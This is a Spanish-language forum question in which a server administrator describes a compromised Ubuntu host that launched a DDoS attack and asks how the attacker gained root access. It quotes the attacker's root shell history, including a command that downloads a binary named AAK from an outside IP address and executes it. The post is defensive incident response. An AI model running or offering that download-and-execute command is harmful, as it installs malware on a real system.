Actualmente tengo un servidor comprometido (Ubuntu) que ejecuta todos los servicios en contenedores Docker, pero hoy encontré un programa malicioso que estaba generando un ataque DDOS.
Revisé todos los servicios en Docker, y están bien, no estaban comprometidos, pero el anfitrión sí. Encontré un archivo ejecutable /AAK
en Ubuntu que creo que fue el ataque DDOS, y encontré en la historia de root
las siguientes entradas:
netstat -antup
chmod 777 AA
wget http://211.142.203.242:7410/AAK
chmod 777 AAK
./AAK
Para mí está claro que fue el origen del ataque, y al verificar los puertos abiertos en el servidor, este proceso abrió un puerto 10XX aleatorio, y otro proceso malicioso tuvo un puerto abierto.
Se abren otros puertos: 80 (nginx en un contenedor de Docker), 22 (SSH, NO usando contraseña, usando claves en su lugar), y 111 (estaba abierto de forma predeterminada y fue utilizado por rpcbind)
¿Cómo puedo comprobar cómo el atacante obtuvo acceso de root al servidor? Si la aplicación en un contenedor Docker no era el origen, ¿qué podría haber causado esta infracción?
No quiero volver a crear el servidor solo para ser pirateado de nuevo con la misma vulnerabilidad.
Editar: olvidé mencionar que estaba usando el complemento vagrant de digital-ocean.